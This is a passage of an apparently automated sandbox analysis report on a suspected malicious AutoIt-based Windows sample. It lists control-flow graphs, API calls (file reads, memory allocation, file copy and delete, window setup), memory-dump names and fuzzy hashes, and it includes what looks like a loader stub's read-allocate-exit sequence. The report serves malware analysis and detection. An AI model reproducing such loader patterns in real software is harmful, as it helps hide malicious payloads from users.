                                                                                  • __dosmaperr.LIBCMT ref: 00200776
                                                                                  • GetFileType.KERNELBASE(00000000), ref: 00200782
                                                                                  • GetLastError.KERNEL32 ref: 0020078C
                                                                                  • __dosmaperr.LIBCMT ref: 00200795
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 002007B5
                                                                                  • CloseHandle.KERNEL32(?), ref: 002008FF
                                                                                  • GetLastError.KERNEL32 ref: 00200931
                                                                                  • __dosmaperr.LIBCMT ref: 00200938
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID: H
                                                                                  • API String ID: 4237864984-2852464175
                                                                                  • Opcode ID: 7a03bfa2c78a8d21cc3d1174085b9f09dacd33baa6d914a11c71c7ddb48efafa
                                                                                  • Instruction ID: fe3b524b73ad9503090fd0b14accc49dcae74bf5800518cd2d42eb04205bbcf6
                                                                                  • Opcode Fuzzy Hash: 7a03bfa2c78a8d21cc3d1174085b9f09dacd33baa6d914a11c71c7ddb48efafa
                                                                                  • Instruction Fuzzy Hash: 77A14A32A202498FEF19AF68D8957AD7BA0EB06320F14015DF8159B2D2DB359D23CB51

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 001C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00291418,?,001C2E7F,?,?,?,00000000), ref: 001C3A78
                                                                                    • Part of subcall function 001C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001C3379
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001C356A
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0020318D
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002031CE
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00203210
                                                                                  • _wcslen.LIBCMT ref: 00203277
                                                                                  • _wcslen.LIBCMT ref: 00203286
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                  • API String ID: 98802146-2727554177
                                                                                  • Opcode ID: aea90ff8428cb018b9e25c9754df83d0358a41867bfeabab347307d0bb7228a5
                                                                                  • Instruction ID: 593ab680528f93d21bec0fda644f84b33e356136661573e3a7f7f74df59084aa
                                                                                  • Opcode Fuzzy Hash: aea90ff8428cb018b9e25c9754df83d0358a41867bfeabab347307d0bb7228a5
                                                                                  • Instruction Fuzzy Hash: 91717C71415301EEC314EF65EC8A9ABBBE8FFA9340B50056EF845931A1EB30DA4CCB59

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001C2B8E
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 001C2B9D
                                                                                  • LoadIconW.USER32(00000063), ref: 001C2BB3
                                                                                  • LoadIconW.USER32(000000A4), ref: 001C2BC5
                                                                                  • LoadIconW.USER32(000000A2), ref: 001C2BD7
                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001C2BEF
                                                                                  • RegisterClassExW.USER32(?), ref: 001C2C40
                                                                                    • Part of subcall function 001C2CD4: GetSysColorBrush.USER32(0000000F), ref: 001C2D07
                                                                                    • Part of subcall function 001C2CD4: RegisterClassExW.USER32(00000030), ref: 001C2D31
                                                                                    • Part of subcall function 001C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001C2D42
                                                                                    • Part of subcall function 001C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001C2D5F
                                                                                    • Part of subcall function 001C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001C2D6F
                                                                                    • Part of subcall function 001C2CD4: LoadIconW.USER32(000000A9), ref: 001C2D85
                                                                                    • Part of subcall function 001C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001C2D94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  • Opcode ID: 14dd8d7e9d65740e1728f0528fa4aed0735620601a4ac42317c9651f92ed7648
                                                                                  • Instruction ID: 0efa8d3367fc69e384f8ee784cdf51c3fbe49fab3e09c884c74162abc5eaeaa7
                                                                                  • Opcode Fuzzy Hash: 14dd8d7e9d65740e1728f0528fa4aed0735620601a4ac42317c9651f92ed7648
                                                                                  • Instruction Fuzzy Hash: DA213A70E10315AFDB109FA6FC4DBA9BFB4FB08B50F14019BE504A66A0D3B14560CF98

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 443 1c3170-1c3185 444 1c31e5-1c31e7 443->444 445 1c3187-1c318a 443->445 444->445 448 1c31e9 444->448 446 1c318c-1c3193 445->446 447 1c31eb 445->447 452 1c3199-1c319e 446->452 453 1c3265-1c326d PostQuitMessage 446->453 450 202dfb-202e23 call 1c18e2 call 1de499 447->450 451 1c31f1-1c31f6 447->451 449 1c31d0-1c31d8 DefWindowProcW 448->449 459 1c31de-1c31e4 449->459 489 202e28-202e2f 450->489 454 1c321d-1c3244 SetTimer RegisterWindowMessageW 451->454 455 1c31f8-1c31fb 451->455 457 1c31a4-1c31a8 452->457 458 202e7c-202e90 call 22bf30 452->458 460 1c3219-1c321b 453->460 454->460 464 1c3246-1c3251 CreatePopupMenu 454->464 461 202d9c-202d9f 455->461 462 1c3201-1c3214 KillTimer call 1c30f2 call 1c3c50 455->462 465 1c31ae-1c31b3 457->465 466 202e68-202e72 call 22c161 457->466 458->460 484 202e96 458->484 460->459 474 202da1-202da5 461->474 475 202dd7-202df6 MoveWindow 461->475 462->460 464->460 471 1c31b9-1c31be 465->471 472 202e4d-202e54 465->472 480 202e77 466->480 482 1c31c4-1c31ca 471->482 483 1c3253-1c3263 call 1c326f 471->483 472->449 478 202e5a-202e63 call 220ad7 472->478 476 202dc6-202dd2 SetFocus 474->476 477 202da7-202daa 474->477 475->460 476->460 477->482 485 202db0-202dc1 call 1c18e2 477->485 478->449 480->460 482->449 482->489 483->460 484->449 485->460 489->449 493 202e35-202e48 call 1c30f2 call 1c3837 489->493 493->449
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001C316A,?,?), ref: 001C31D8
                                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,001C316A,?,?), ref: 001C3204
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001C3227
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001C316A,?,?), ref: 001C3232
                                                                                  • CreatePopupMenu.USER32 ref: 001C3246
                                                                                  • PostQuitMessage.USER32(00000000), ref: 001C3267
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  • Opcode ID: 318bf85ca1532f5d8ce580802ee797ae68e401036f3eb77bff863a749ad73e8e
                                                                                  • Instruction ID: 6dd3c8b1c96906b2d5a9318e62ca9edebd756ae71cac2fcff7b57ff3954ec458
                                                                                  • Opcode Fuzzy Hash: 318bf85ca1532f5d8ce580802ee797ae68e401036f3eb77bff863a749ad73e8e
                                                                                  • Instruction Fuzzy Hash: 71413A35250302AFDF192B78ED0DFB93A29E729340F18811EF522856E2D770DE20DB65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: D%)$D%)$D%)$D%)$D%)D%)$Variable must be of type 'Object'.
                                                                                  • API String ID: 0-1317950358
                                                                                  • Opcode ID: a5a047458195d3bd3b1c37e585a241a1aa86a48635581d304d17624cbb183575
                                                                                  • Instruction ID: f0b8ebd9576286bb7f176da6c339e2b48e2bcce904791ffe8ddeb678c4de793d
                                                                                  • Opcode Fuzzy Hash: a5a047458195d3bd3b1c37e585a241a1aa86a48635581d304d17624cbb183575
                                                                                  • Instruction Fuzzy Hash: 62C26A71A00215DFCB24CF98C884FADB7F1BB28310F258569E916AB391D375EE91CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1009 1f8d45-1f8d55 1010 1f8d6f-1f8d71 1009->1010 1011 1f8d57-1f8d6a call 1ef2c6 call 1ef2d9 1009->1011 1013 1f90d9-1f90e6 call 1ef2c6 call 1ef2d9 1010->1013 1014 1f8d77-1f8d7d 1010->1014 1027 1f90f1 1011->1027 1032 1f90ec call 1f27ec 1013->1032 1014->1013 1017 1f8d83-1f8dae 1014->1017 1017->1013 1020 1f8db4-1f8dbd 1017->1020 1023 1f8dbf-1f8dd2 call 1ef2c6 call 1ef2d9 1020->1023 1024 1f8dd7-1f8dd9 1020->1024 1023->1032 1025 1f8ddf-1f8de3 1024->1025 1026 1f90d5-1f90d7 1024->1026 1025->1026 1030 1f8de9-1f8ded 1025->1030 1031 1f90f4-1f90f9 1026->1031 1027->1031 1030->1023 1034 1f8def-1f8e06 1030->1034 1032->1027 1037 1f8e08-1f8e0b 1034->1037 1038 1f8e23-1f8e2c 1034->1038 1040 1f8e0d-1f8e13 1037->1040 1041 1f8e15-1f8e1e 1037->1041 1042 1f8e2e-1f8e45 call 1ef2c6 call 1ef2d9 call 1f27ec 1038->1042 1043 1f8e4a-1f8e54 1038->1043 1040->1041 1040->1042 1044 1f8ebf-1f8ed9 1041->1044 1075 1f900c 1042->1075 1046 1f8e5b-1f8e79 call 1f3820 call 1f29c8 * 2 1043->1046 1047 1f8e56-1f8e58 1043->1047 1048 1f8edf-1f8eef 1044->1048 1049 1f8fad-1f8fb6 call 1ff89b 1044->1049 1078 1f8e7b-1f8e91 call 1ef2d9 call 1ef2c6 1046->1078 1079 1f8e96-1f8ebc call 1f9424 1046->1079 1047->1046 1048->1049 1052 1f8ef5-1f8ef7 1048->1052 1062 1f9029 1049->1062 1063 1f8fb8-1f8fca 1049->1063 1052->1049 1056 1f8efd-1f8f23 1052->1056 1056->1049 1060 1f8f29-1f8f3c 1056->1060 1060->1049 1065 1f8f3e-1f8f40 1060->1065 1067 1f902d-1f9045 ReadFile 1062->1067 1063->1062 1068 1f8fcc-1f8fdb GetConsoleMode 1063->1068 1065->1049 1070 1f8f42-1f8f6d 1065->1070 1072 1f9047-1f904d 1067->1072 1073 1f90a1-1f90ac GetLastError 1067->1073 1068->1062 1074 1f8fdd-1f8fe1 1068->1074 1070->1049 1077 1f8f6f-1f8f82 1070->1077 1072->1073 1082 1f904f 1072->1082 1080 1f90ae-1f90c0 call 1ef2d9 call 1ef2c6 1073->1080 1081 1f90c5-1f90c8 1073->1081 1074->1067 1083 1f8fe3-1f8ffd ReadConsoleW 1074->1083 1076 1f900f-1f9019 call 1f29c8 1075->1076 1076->1031 1077->1049 1089 1f8f84-1f8f86 1077->1089 1078->1075 1079->1044 1080->1075 1086 1f90ce-1f90d0 1081->1086 1087 1f9005-1f900b call 1ef2a3 1081->1087 1093 1f9052-1f9064 1082->1093 1084 1f8fff GetLastError 1083->1084 1085 1f901e-1f9027 1083->1085 1084->1087 1085->1093 1086->1076 1087->1075 1089->1049 1096 1f8f88-1f8fa8 1089->1096 1093->1076 1100 1f9066-1f906a 1093->1100 1096->1049 1104 1f906c-1f907c call 1f8a61 1100->1104 1105 1f9083-1f908e 1100->1105 1114 1f907f-1f9081 1104->1114 1107 1f909a-1f909f call 1f88a1 1105->1107 1108 1f9090 call 1f8bb1 1105->1108 1115 1f9095-1f9098 1107->1115 1108->1115 1114->1076 1115->1114
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 397e2a1650b8dc9126f4ac4123b8b032742b202da1a0f451596b5c6596db5cfa
                                                                                  • Instruction ID: d28cbf7cd4cf8f708ed8d5b3a2a3cdec002138b5606fdb6725ba22eca84d1530
                                                                                  • Opcode Fuzzy Hash: 397e2a1650b8dc9126f4ac4123b8b032742b202da1a0f451596b5c6596db5cfa
                                                                                  • Instruction Fuzzy Hash: 82C1F275A0434DAFCB11EFA9D845BBDBBB4BF19310F144199FA19A7392CB318942CB60

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1117 16856e8-1685796 call 1683108 1120 168579d-16857c3 call 16865f8 CreateFileW 1117->1120 1123 16857ca-16857da 1120->1123 1124 16857c5 1120->1124 1132 16857dc 1123->1132 1133 16857e1-16857fb VirtualAlloc 1123->1133 1125 1685915-1685919 1124->1125 1126 168595b-168595e 1125->1126 1127 168591b-168591f 1125->1127 1129 1685961-1685968 1126->1129 1130 168592b-168592f 1127->1130 1131 1685921-1685924 1127->1131 1136 168596a-1685975 1129->1136 1137 16859bd-16859d2 1129->1137 1138 168593f-1685943 1130->1138 1139 1685931-168593b 1130->1139 1131->1130 1132->1125 1134 16857fd 1133->1134 1135 1685802-1685819 ReadFile 1133->1135 1134->1125 1140 168581b 1135->1140 1141 1685820-1685860 VirtualAlloc 1135->1141 1142 1685979-1685985 1136->1142 1143 1685977 1136->1143 1144 16859e2-16859ea 1137->1144 1145 16859d4-16859df VirtualFree 1137->1145 1146 1685953 1138->1146 1147 1685945-168594f 1138->1147 1139->1138 1140->1125 1148 1685862 1141->1148 1149 1685867-1685882 call 1686848 1141->1149 1150 1685999-16859a5 1142->1150 1151 1685987-1685997 1142->1151 1143->1137 1145->1144 1146->1126 1147->1146 1148->1125 1157 168588d-1685897 1149->1157 1154 16859b2-16859b8 1150->1154 1155 16859a7-16859b0 1150->1155 1153 16859bb 1151->1153 1153->1129 1154->1153 1155->1153 1158 1685899-16858c8 call 1686848 1157->1158 1159 16858ca-16858de call 1686658 1157->1159 1158->1157 1164 16858e0 1159->1164 1165 16858e2-16858e6 1159->1165 1164->1125 1167 16858e8-16858ec CloseHandle 1165->1167 1168 16858f2-16858f6 1165->1168 1167->1168 1169 16858f8-1685903 VirtualFree 1168->1169 1170 1685906-168590f 1168->1170 1169->1170 1170->1120 1170->1125
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016857B9
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016859DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileFreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 204039940-0
                                                                                  • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                  • Instruction ID: 7322735a5f4ac385548dbf15a40dde41c17ab9668ac81e31fe1f25c694076716
                                                                                  • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                  • Instruction Fuzzy Hash: BAA11770E00219EBDF14DFA4C884BEEBBB5BF49315F208259E212BB281D7759A41CF95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1181 1c2c63-1c2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001C2C91
                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001C2CB2
                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,001C1CAD,?), ref: 001C2CC6
                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,001C1CAD,?), ref: 001C2CCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateShow
                                                                                  • String ID: AutoIt v3$edit
                                                                                  • API String ID: 1584632944-3779509399
                                                                                  • Opcode ID: 09275ad0623f943ccfac0762e32e3184e240aa1a4c0dbda73feccb4c63c9cb3a
                                                                                  • Instruction ID: 0e4c5fe11fc601944d2dcf43fd8dc0f46a30c6fe00748835b2e066b9ba8b0bf5
                                                                                  • Opcode Fuzzy Hash: 09275ad0623f943ccfac0762e32e3184e240aa1a4c0dbda73feccb4c63c9cb3a
                                                                                  • Instruction Fuzzy Hash: 5EF0D4756403917EEB311B27BC0CEB76EBDD7CAF61B10009AF904A25A0D6715864DAB8

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1296 16854b8-16855e9 call 1683108 call 16853a8 CreateFileW 1303 16855eb 1296->1303 1304 16855f0-1685600 1296->1304 1305 16856a0-16856a5 1303->1305 1307 1685602 1304->1307 1308 1685607-1685621 VirtualAlloc 1304->1308 1307->1305 1309 1685623 1308->1309 1310 1685625-168563c ReadFile 1308->1310 1309->1305 1311 168563e 1310->1311 1312 1685640-168567a call 16853e8 call 16843a8 1310->1312 1311->1305 1317 168567c-1685691 call 1685438 1312->1317 1318 1685696-168569e ExitProcess 1312->1318 1317->1318 1318->1305
                                                                                  APIs
                                                                                    • Part of subcall function 016853A8: Sleep.KERNELBASE(000001F4), ref: 016853B9
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016855DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileSleep
                                                                                  • String ID: ZJQMPMQNEZON2
                                                                                  • API String ID: 2694422964-2918389996
                                                                                  • Opcode ID: 97ff0b9ab20aeb35f064bcdb974fadfac93b9586a984f2108b4ff4f2bfabbdd1
                                                                                  • Instruction ID: 0b7e8d012f3da7e71241ae6361f263aada79154b78e866c58a9d945aeb95cbd3
                                                                                  • Opcode Fuzzy Hash: 97ff0b9ab20aeb35f064bcdb974fadfac93b9586a984f2108b4ff4f2bfabbdd1
                                                                                  • Instruction Fuzzy Hash: 9551AF30D04259EBEF11EBA4DC15BEEBB79AF18304F004299E609BB2C1D7B91B45CB65

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1320 232947-2329b9 call 201f50 call 2325d6 call 1dfe0b call 1c5722 call 23274e call 1c511f call 1e5232 1335 2329bf-2329c6 call 232e66 1320->1335 1336 232a6c-232a73 call 232e66 1320->1336 1341 232a75-232a77 1335->1341 1342 2329cc-232a6a call 1ed583 call 1e4983 call 1e9038 call 1ed583 call 1e9038 * 2 1335->1342 1336->1341 1343 232a7c 1336->1343 1344 232cb6-232cb7 1341->1344 1346 232a7f-232b3a call 1c50f5 * 8 call 233017 call 1ee5eb 1342->1346 1343->1346 1349 232cd5-232cdb 1344->1349 1385 232b43-232b5e call 232792 1346->1385 1386 232b3c-232b3e 1346->1386 1350 232cf0-232cf6 1349->1350 1351 232cdd-232ced call 1dfdcd call 1dfe14 1349->1351 1351->1350 1389 232bf0-232bfc call 1ee678 1385->1389 1390 232b64-232b6c 1385->1390 1386->1344 1397 232c12-232c16 1389->1397 1398 232bfe-232c0d DeleteFileW 1389->1398 1391 232b74 1390->1391 1392 232b6e-232b72 1390->1392 1394 232b79-232b97 call 1c50f5 1391->1394 1392->1394 1402 232bc1-232bd7 call 23211d call 1edbb3 1394->1402 1403 232b99-232b9e 1394->1403 1400 232c91-232ca5 CopyFileW 1397->1400 1401 232c18-232c7e call 2325d6 call 1ed2eb * 2 call 2322ce 1397->1401 1398->1344 1405 232ca7-232cb4 DeleteFileW 1400->1405 1406 232cb9-232ccf DeleteFileW call 232fd8 1400->1406 1401->1406 1425 232c80-232c8f DeleteFileW 1401->1425 1420 232bdc-232be7 1402->1420 1407 232ba1-232bb4 call 2328d2 1403->1407 1405->1344 1411 232cd4 1406->1411 1418 232bb6-232bbf 1407->1418 1411->1349 1418->1402 1420->1390 1422 232bed 1420->1422 1422->1389 1425->1344
                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00232C05
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00232C87
                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00232C9D
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00232CAE
                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00232CC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Copy
                                                                                  • String ID:
                                                                                  • API String ID: 3226157194-0
                                                                                  • Opcode ID: e5c59daa809b9d8f77b2d4b5f66751a063d70c5e450a6ee68383b9b8b2212f97
                                                                                  • Instruction ID: adf8056edf935cdc4c95a41997191406768ecdc71992206ec545b7d1299b681c
                                                                                  • Opcode Fuzzy Hash: e5c59daa809b9d8f77b2d4b5f66751a063d70c5e450a6ee68383b9b8b2212f97
                                                                                  • Instruction Fuzzy Hash: 44B15FB1D10219ABDF21DFA4CC85EDEB7BDEF58350F1040A6F509E6141EB30AA588F61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1462 1c3b1c-1c3b27 1463 1c3b99-1c3b9b 1462->1463 1464 1c3b29-1c3b2e 1462->1464 1465 1c3b8c-1c3b8f 1463->1465 1464->1463 1466 1c3b30-1c3b48 RegOpenKeyExW 1464->1466 1466->1463 1467 1c3b4a-1c3b69 RegQueryValueExW 1466->1467 1468 1c3b6b-1c3b76 1467->1468 1469 1c3b80-1c3b8b RegCloseKey 1467->1469 1470 1c3b78-1c3b7a 1468->1470 1471 1c3b90-1c3b97 1468->1471 1469->1465 1472 1c3b7e 1470->1472 1471->1472 1472->1469
                                                                                  APIs
